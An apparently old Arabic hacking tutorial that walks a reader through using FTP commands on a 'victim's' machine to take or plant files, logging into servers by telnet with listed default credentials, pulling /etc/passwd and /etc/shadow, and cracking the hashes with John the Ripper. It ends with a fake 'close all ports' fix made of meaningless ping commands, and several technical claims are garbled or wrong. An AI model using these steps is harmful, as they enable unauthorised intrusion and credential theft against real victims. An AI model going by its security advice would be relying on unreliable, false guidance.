230 Anonymous user logged in.
مبرووووك انت الحين في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية الع**ية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status oka about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user. 221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
Telnet
ما هي التيل نت ؟
التيل نت هي أداة قديمة في لينوكس(Linux) وينوكس(Unix) وأصبحت الآن موجودة في ويندوز .
كيف يتم استخدامها سابقا ؟
كانت تستخدم للتصفح بحيث ان مواقع الانترنت كانت مجرد نصوص بدون صور ... تخيل كم كانت الشبكة كئيبة ...
كيف يتم استخدامها الآن ؟
1 ــ قراءة بريدك الالكتروني بالطريقة التالية :
اذهب إلى متصفحك واكتب
telnet://hotmail.com:25/ وسوف يطلب اسم مستخدم وكلمة مرور(طبعا بعد ان يفتح التيل نت) ضع اسم بريدك وكلمة السر الخاصة بك واقرأ بريدك واتخدم الأمر Del msg#1 لحذف الرسالة الأولى وغير الرقم 1 برقم الرسالة المراد حذفها .
2 ــ اختراق الأجهزة :
ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف \ إضافة \ إزالة الملفات فيه ...
تتم أيضا بنفس الطريقة من متصفحك اكتب
telnet://ipnumberort/ حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
21 - 25 - 32(الأساسي) - 99 - 2001
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال
3 ــ اختراق المواقع :
يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في موقع
http://packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
اسم المستخدم : كلمة المرور
anonymous : anonymous
guest : guest
root : root
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكس Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
young
test
لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
أي الحسابات الغير محمية بكلمة سر .
اكتب الأمر :
GET /etc/passwd و GET /etc/group و GET /etc/shadow
ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
data = download
لكي تتمكن من التحكم بالملفات
__________________________________
ماهو الملف psswd ?
الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد .
هذا الملف في ثلاث حالات :
1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
3 ــ متروك مثل ما هو ..
لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
الباسووردات مشفرة ... سوف تراها كالمثال التالي :
sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
هنا سوف نعرف المعلومات التالية:
1 ــ اسم المستخدم : sirhack .
2 ــ كلمة السر : 89fGc%^7 .
3 ــ الاسم الحقيقي : Sir Hackalot .
4 ــ مجلد الحساب : usr/sirhack/
5 ــ الغلاف(هنا الكلام في ينوكس او لينوكس) : bin/sh/
كما رأيتم فكلمة السر مشفرة .
ما هو الملف group ?
هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .
ما هو الملف shadow ?
في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...
كيف أفك التشفير ؟
استخدم أحد برنامجين :
1 ــ Cracker Jack .
2 ــ John the ripper .
وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكس(وينوكس) ...
نسخة اللينوكس
http://www.openwall.com/john/john-1.6.tar.gz
نسخة الويندوز
http://www.openwall.com/john/john-16w.zip
إغلاق المنافذ port الموجودة بالجهاز
اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ......
اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .
اتمنى اتباع الطريقه كما هي :
إدهب إلى:
Start&gRun ابداء &l تشغيل
واكتب الامر التالي
command.com
ستظهر لك نافذة إكتب فيها:
ping host
و إضغط enter ثم إنتظر و اكتب:
ping port
و إضغط enter
ثم إنتظر و اكتب:
ping port1027
وإضغط enter
و إنتظر ثم إكتب:
ping port80
و إضغط enter
ثم اكتب:
ping
و إضغط enter
ثم اكتب:
ping port
و إضغط enter
و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية